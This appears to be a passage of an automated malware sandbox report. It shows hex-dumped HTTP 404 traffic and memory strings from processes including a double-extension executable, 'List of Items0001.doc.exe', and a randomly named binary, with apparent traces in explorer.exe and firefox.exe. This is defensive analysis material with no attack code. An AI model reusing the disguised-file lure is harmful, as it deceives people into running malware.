20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Sep 2024 09:30:17 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Sep 2024 09:30:20 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:31:15 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8e 31 0f 82 30 10 85 f7 fe 8a 93 5d 0e 0d e3 a5 83 02 91 04 91 98 32 38 62 5a 53 12 a4 48 8b c6 7f 2f 85 c5 f1 dd fb ee cb a3 4d 72 39 8a 5b 95 c2 49 9c 0b a8 ea 43 91 1f 21 d8 22 e6 a9 c8 10 13 91 ac cd 3e 8c 10 d3 32 e0 8c b4 7b 76 9c b4 6a e4 1c 5c eb 3a c5 e3 28 86 d2 38 c8 cc d4 4b c2 f5 c8 08 17 88 ee 46 7e fd df 8e ff 31 73 62 34 70 a1 15 8c ea 35 29 eb 94 84 fa 5a c0 a7 b1 d0 cf dc c3 73 60 7a 70 ba b5 60 d5 f8 56 63 48 38 78 ef 62 9c 1d 7e 09 fb 01 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: adM10]28bZSH/Mr9[IC!">2{vj\:(8KF~1sb4p5)Zs`zp`VcH8xb~|<0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:31:18 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8e 31 0f 82 30 10 85 f7 fe 8a 93 5d 0e 0d e3 a5 83 02 91 04 91 98 32 38 62 5a 53 12 a4 48 8b c6 7f 2f 85 c5 f1 dd fb ee cb a3 4d 72 39 8a 5b 95 c2 49 9c 0b a8 ea 43 91 1f 21 d8 22 e6 a9 c8 10 13 91 ac cd 3e 8c 10 d3 32 e0 8c b4 7b 76 9c b4 6a e4 1c 5c eb 3a c5 e3 28 86 d2 38 c8 cc d4 4b c2 f5 c8 08 17 88 ee 46 7e fd df 8e ff 31 73 62 34 70 a1 15 8c ea 35 29 eb 94 84 fa 5a c0 a7 b1 d0 cf dc c3 73 60 7a 70 ba b5 60 d5 f8 56 63 48 38 78 ef 62 9c 1d 7e 09 fb 01 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: adM10]28bZSH/Mr9[IC!">2{vj\:(8KF~1sb4p5)Zs`zp`VcH8xb~|<0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:31:20 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8e 31 0f 82 30 10 85 f7 fe 8a 93 5d 0e 0d e3 a5 83 02 91 04 91 98 32 38 62 5a 53 12 a4 48 8b c6 7f 2f 85 c5 f1 dd fb ee cb a3 4d 72 39 8a 5b 95 c2 49 9c 0b a8 ea 43 91 1f 21 d8 22 e6 a9 c8 10 13 91 ac cd 3e 8c 10 d3 32 e0 8c b4 7b 76 9c b4 6a e4 1c 5c eb 3a c5 e3 28 86 d2 38 c8 cc d4 4b c2 f5 c8 08 17 88 ee 46 7e fd df 8e ff 31 73 62 34 70 a1 15 8c ea 35 29 eb 94 84 fa 5a c0 a7 b1 d0 cf dc c3 73 60 7a 70 ba b5 60 d5 f8 56 63 48 38 78 ef 62 9c 1d 7e 09 fb 01 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: adM10]28bZSH/Mr9[IC!">2{vj\:(8KF~1sb4p5)Zs`zp`VcH8xb~|<0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:31:23 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: firefox.exe, 00000008.00000003.674458839038.000001F76FB98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/r1.crl0
        Source: firefox.exe, 00000008.00000003.674458839038.000001F76FB98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
        Source: firefox.exe, 00000008.00000003.674458839038.000001F76FB98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
        Source: explorer.exe, 00000009.00000000.677551987614.00000000091CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C8A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678895082217.00000000091CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C8A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
        Source: explorer.exe, 00000009.00000002.678908041013.000000000C3A1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677565828265.000000001050C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678915551675.0000000010436000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678915551675.000000001050C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677565828265.0000000010436000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C3A1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
        Source: List of Items0001.doc.exe, 00000003.00000003.674114777059.0000000002354000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674210019469.0000000002354000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000003.674043335164.0000000002354000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000003.674043077042.0000000002354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: List of Items0001.doc.exe, 00000003.00000003.674114777059.0000000002354000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674210019469.0000000002354000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000003.674043335164.0000000002354000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000003.674043077042.0000000002354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: List of Items0001.doc.exe, 00000003.00000003.674114777059.0000000002354000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674210019469.0000000002354000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000003.674043335164.0000000002354000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000003.674043077042.0000000002354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
        Source: List of Items0001.doc.exe, 00000003.00000003.674114777059.0000000002354000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674210019469.0000000002354000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000003.674043335164.0000000002354000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000003.674043077042.0000000002354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
        Source: firefox.exe, 00000008.00000003.674458839038.000001F76FB98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
        Source: firefox.exe, 00000008.00000003.674458839038.000001F76FB98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
        Source: firefox.exe, 00000008.00000003.674458839038.000001F76FB98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
        Source: explorer.exe, 00000009.00000000.677551987614.00000000091CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C8A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678895082217.00000000091CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C8A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
        Source: explorer.exe, 00000009.00000002.678908041013.000000000C3A1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677565828265.000000001050C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678915551675.0000000010436000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678915551675.000000001050C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677565828265.0000000010436000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C3A1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
        Source: firefox.exe, 00000008.00000003.674458839038.000001F76FB98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
        Source: firefox.exe, 00000008.00000003.674458839038.000001F76FB98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: firefox.exe, 00000008.00000003.674458839038.000001F76FB98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/r1.crt0
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
